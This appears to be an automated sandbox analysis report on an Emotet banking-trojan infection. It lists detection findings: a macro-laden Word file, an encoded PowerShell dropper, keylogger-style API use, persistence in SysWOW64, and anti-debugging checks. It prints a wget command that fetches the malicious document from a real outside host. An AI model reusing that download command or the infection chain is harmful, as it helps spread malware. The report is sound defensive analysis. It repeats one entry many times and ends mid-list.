    https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    https://visio.uservoice.com/forums/368202-visio-on-devices
    https://web.microsoftstream.com/video/
    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    https://wus2-000.contentsync.
    https://wus2-000.pagecontentsync.
    https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: 879.exe, 0000000C.00000002.2126942233.000000000083A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\879.exe Code function: 12_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\879.exe Code function: 12_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\879.exe Code function: 12_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Users\user\879.exe Code function: 12_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\879.exe Code function: 12_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Users\user\879.exe Code function: 12_2_00437723 GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00437723 GetKeyState,GetKeyState,GetKeyState

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e <base64-encoded command omitted>
Yara detected Emotet
Source: Yara match File source: 0000000C.00000002.2126423927.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2421877565.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2126369833.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2421897150.0000000000681000.00000020.00000001.sdmp, type: MEMORY

System Summary:

Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\879.exe
Very long command line found
Source: unknown Process created: Commandline size = 2158
Contains functionality to call native functions
Source: C:\Users\user\879.exe Code function: 12_2_004382BB NtdllDefWindowProc_A,GetWindowRect,SetRect,InvalidateRect,SetRect,InvalidateRect,SetRect,SetRect,InvalidateRect,SetRect,InvalidateRect
Source: C:\Users\user\879.exe Code function: 12_2_004165F4 NtdllDefWindowProc_A
Source: C:\Users\user\879.exe Code function: 12_2_00418CF6 __CxxThrowException@8,__snprintf_s,NtdllDefWindowProc_A
Source: C:\Users\user\879.exe Code function: 12_2_00418D07 __snprintf_s,__snprintf_s,NtdllDefWindowProc_A
Source: C:\Users\user\879.exe Code function: 12_2_00418F60 _memset,NtdllDefWindowProc_A
Source: C:\Users\user\879.exe Code function: 12_2_00413773 NtdllDefWindowProc_A,CallWindowProcA
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004382BB NtdllDefWindowProc_A,GetWindowRect,SetRect,InvalidateRect,SetRect,InvalidateRect,SetRect,SetRect,InvalidateRect,SetRect,InvalidateRect
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004165F4 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00418CF6 __CxxThrowException@8,__snprintf_s,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00418D07 __snprintf_s,__snprintf_s,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00418F60 _memset,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00413773 NtdllDefWindowProc_A,CallWindowProcA
Creates files inside the system directory
Source: C:\Users\user\879.exe File created: C:\Windows\SysWOW64\LaunchWinApp\
Detected potential crypto function
Source: C:\Users\user\879.exe Code function: 12_2_004180EC
Source: C:\Users\user\879.exe Code function: 12_2_0044A120
Source: C:\Users\user\879.exe Code function: 12_2_0045E3C3
Source: C:\Users\user\879.exe Code function: 12_2_0043C4F0
Source: C:\Users\user\879.exe Code function: 12_2_0045E637
Source: C:\Users\user\879.exe Code function: 12_2_004506A9
Source: C:\Users\user\879.exe Code function: 12_2_004567B2
Source: C:\Users\user\879.exe Code function: 12_2_004507BF
Source: C:\Users\user\879.exe Code function: 12_2_0045E941
Source: C:\Users\user\879.exe Code function: 12_2_00462912
Source: C:\Users\user\879.exe Code function: 12_2_0044AC92
Source: C:\Users\user\879.exe Code function: 12_2_0043EEA9
Source: C:\Users\user\879.exe Code function: 12_2_0045B029
Source: C:\Users\user\879.exe Code function: 12_2_0045F0CB
Source: C:\Users\user\879.exe Code function: 12_2_00403080
Source: C:\Users\user\879.exe Code function: 12_2_004531CC
Source: C:\Users\user\879.exe Code function: 12_2_0045D2F9
Source: C:\Users\user\879.exe Code function: 12_2_0043F37C
Source: C:\Users\user\879.exe Code function: 12_2_0043F750
Source: C:\Users\user\879.exe Code function: 12_2_00457875
Source: C:\Users\user\879.exe Code function: 12_2_0045D822
Source: C:\Users\user\879.exe Code function: 12_2_00457A62
Source: C:\Users\user\879.exe Code function: 12_2_0043FB5C
Source: C:\Users\user\879.exe Code function: 12_2_00445C6F
Source: C:\Users\user\879.exe Code function: 12_2_0045DD64
Source: C:\Users\user\879.exe Code function: 12_2_0044DE61
Source: C:\Users\user\879.exe Code function: 12_2_0043FF7C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004180EC
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0044A120
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045E3C3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043C4F0
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045E637
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004506A9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004567B2
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004507BF
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045E941
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00462912
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0044AC92
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043EEA9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045B029
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045F0CB
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00403080
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_004531CC
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045D2F9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043F37C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043F750
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00457875
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045D822
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00457A62
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043FB5C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00445C6F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0045DD64
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0044DE61
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043FF7C
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: QDC5QK1.doc.2.dr OLE, VBA macro line: Private Sub Document_open()
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: String function: 0043D624 appears 97 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: String function: 0044556E appears 43 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: String function: 0041EC48 appears 56 times
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: String function: 0043CA63 appears 201 times
Source: C:\Users\user\879.exe Code function: String function: 0043D624 appears 97 times
Source: C:\Users\user\879.exe Code function: String function: 0044556E appears 43 times
Source: C:\Users\user\879.exe Code function: String function: 0041EC48 appears 56 times
Source: C:\Users\user\879.exe Code function: String function: 0043CA63 appears 201 times
PE file contains strange resources
Source: 879.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: C:\Users\user\Documents\20200207\PowerShell_transcript.124406.N+qwB_ba.20200207211426.txt, type: DROPPED Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification label
Source: classification engine Classification label: mal100.bank.troj.evad.win@10/19@2/6
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\879.exe Code function: 12_2_0040C4C0 FindResourceA,LoadResource,FreeResource
Creates files inside the user directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\Desktop\cmdline.out
Creates mutexes
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_01
Creates temporary files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{05FE7762-2413-4F4B-B7EF-7A27ADCA0B77} - OProcSessId.dat
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Reads ini files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\wget.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Spawns processes
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/' > cmdline.out 2>&1
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\QDC5QK1.doc' /o ''
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e <base64-encoded command omitted>
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\879.exe C:\Users\user\879.exe
Source: unknown Process created: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Source: C:\Users\user\879.exe Process created: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\879.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Binary contains paths to debug symbols
Source: Binary string: c:\Users\User\Desktop\2005\6.2.20\ScrollerCtrl_demo\ScrollerTest\Release\ScrollerTest.pdb source: 879.exe, LaunchWinApp.exe

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: QDC5QK1.doc.2.dr Stream path 'Macros/VBA/Hxzvhpvip' : High number of string operations
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e <base64-encoded command omitted>
Contains functionality to dynamically determine API calls
Source: C:\Users\user\879.exe Code function: 12_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\879.exe Code function: 12_2_0043CB3B push ecx; ret 12_2_0043CB4E
Source: C:\Users\user\879.exe Code function: 12_2_0043D669 push ecx; ret 12_2_0043D67C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043CB3B push ecx; ret 13_2_0043CB4E
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0043D669 push ecx; ret 13_2_0043D67C
Sample is packed with UPX
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\879.exe Executable created and started: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\879.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\879.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\879.exe PE file moved: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\879.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\879.exe File opened: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\879.exe Code function: 12_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Users\user\879.exe Code function: 12_2_0040C2A0 IsIconic
Source: C:\Users\user\879.exe Code function: 12_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\879.exe Code function: 12_2_0042D6B9 IsWindowVisible,IsIconic
Source: C:\Users\user\879.exe Code function: 12_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0040C2A0 IsIconic
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0042D6B9 IsWindowVisible,IsIconic
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Disables application error messages (SetErrorMode)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (116 identical entries)
Source: C:\Users\user\879.exe; Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Process information set: NOOPENFILEERRORBOX (5 identical entries)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2631
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes; graph_13-49228
Source: C:\Users\user\879.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes; graph_12-49351
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548; Thread sleep time: -922337203685477s >= -30000s
Checks the free space of hard drives
Source: C:\Users\user\879.exe; File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\879.exe; Code function: 12_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen
Source: C:\Users\user\879.exe; Code function: 12_2_0042FC18 lstrlen,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_0042FC18 lstrlen,FindFirstFileA,FindClose
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW2
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW
Program exit points
Source: C:\Users\user\879.exe; API call chain: ExitProcess graph end node; graph_12-49522
Source: C:\Users\user\879.exe; API call chain: ExitProcess graph end node; graph_12-49508
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; API call chain: ExitProcess graph end node; graph_13-49398
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; API call chain: ExitProcess graph end node; graph_13-49384
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\879.exe; Code function: 12_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Contains functionality to dynamically determine API calls
Source: C:\Users\user\879.exe; Code function: 12_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Contains functionality to read the PEB
Source: C:\Users\user\879.exe; Code function: 12_2_00403040 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_00403040 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
